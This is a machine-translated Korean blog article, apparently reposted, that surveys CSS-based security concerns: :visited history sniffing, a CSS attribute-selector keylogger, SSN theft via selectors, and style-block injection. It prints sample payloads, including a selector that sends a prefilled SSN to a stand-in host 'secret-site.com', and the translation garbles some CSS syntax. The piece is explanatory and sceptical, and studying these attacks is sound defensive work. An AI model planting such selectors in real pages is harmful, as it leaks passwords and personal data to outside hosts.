CSS 보안 취약점

당황하지 말 것! CSS 자체는 주요 보안 위험이 아니며 대부분의 경우 너무 걱정할 필요가 없습니다.

그러나 일부 기사는 잠재적으로 놀랍고 걱정하는 CSS의 특징에 대해 논의 할 것입니다. 요약하자 :

방문한 링크 문제

문제는 다음과 같이 설명됩니다.

1. 웹 사이트에는 간단한 돼지 와 같은 특정 페이지에 대한 링크가 있습니다.
2. 당신은 :visited 을 사용하기 위해 방문한 링크의 색상을 설정하여 a:visited { color: pink; } , 기본 사용자 에이전트 스타일이 아닙니다.
3. 링크의 계산 스타일을 테스트합니다.
4. 색상이 분홍색 인 경우 사용자가 페이지를 방문했음을 의미합니다.
5. 이 정보를 서버에보고하고 그에 따라 특정 조치를 수행합니다 (예 : 보험료 율 증가).

:visited 스타일에는 background-image: url(/data-logger/tickle.php); 페이지를 방문한 사용자 만 요청합니다.

괜찮아요! 브라우저는이 공격을 차단했습니다.

키로거

문제는 다음과 같이 설명됩니다.

1. 페이지에 입력 상자, 아마도 암호 입력 상자가있을 수 있습니다.
2. 입력 상자의 배경 이미지로 레코드 스크립트를 가져 와서 비밀번호 정보를 수집하기 위해 많은 수의 선택기를 추가합니다.

 입력 [value^= "a"] {배경 : url (logger.php? v = a); }

이것은 달성하기가 쉽지 않습니다. 입력 상자의 value 속성은 사용자 입력으로 인해 즉시 변경되지 않습니다. 그러나 React와 같은 프레임 워크에서는 때때로 발생합니다. 따라서 이론적 으로이 CSS Keylogger는이 CSS를 React로 구축 한 로그인 페이지에 추가하면 작동 할 수 있습니다.

그러나이 경우 JavaScript 코드가 페이지에서 실행되었습니다. 이러한 공격의 경우 JavaScript는 CSS보다 훨씬 위험합니다. JavaScript Keylogger는 주요 이벤트를 모니터링하고 몇 줄의 코드로 Ajax를 통해보고합니다.

CSP (Content Security Policy)는 타사 및 XSS가 주입 한 인라인 JavaScript를 차단할 수 있습니다. 물론 CSS를 차단할 수도 있습니다.

데이터 도난

문제는 다음과 같이 설명됩니다.

1. 웹 사이트 페이지에 악의적 인 CSS를 추가 할 수 있다면 로그인합니다 ...
2. 그리고 웹 사이트에는 양식으로 미리 채워진 사회 보장 번호 (SSN)와 같은 민감한 정보가 표시됩니다.
3. 속성 선택기로받을 수 있습니다.

 입력#ssn [value = "123-45-6789"] {배경 : URL (https://secret-site.com/logger.php?ssn=123-45-6789); }

많은 수의 선택기를 사용하면 모든 가능성을 다룰 수 있습니다!

인라인 스타일 블록 문제

이것이 CSS에서 비난 해야하는지 확실하지 않지만 상상해보십시오.

 ... 일부 사용자 생성 콘텐츠 삽입 ...

어쩌면 사용자가 일부 CSS를 사용자 정의 할 수 있습니다. 스타일 태그를 닫고 스크립트 태그를 열고 악의적 인 JavaScript 코드를 작성할 수 있기 때문에 공격 벡터입니다.

확실히 더 있습니다

당신은 그것을 생각 했습니까? 공유하십시오.

저는 CSS 보안 취약점에 대한 두려움 수준에 회의적입니다. 전문가가 아니고 안전이 중요하기 때문에 보안 문제 (특히 타사 문제)를 최고로 정비하고 싶지 않습니다. 그러나 동시에, 나는 CSS가 사고 실험 이외의 공격 벡터가되는 것에 대해 들어 본 적이 없습니다. 제발 가르쳐주세요!

위 내용은 CSS 보안 취약점의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!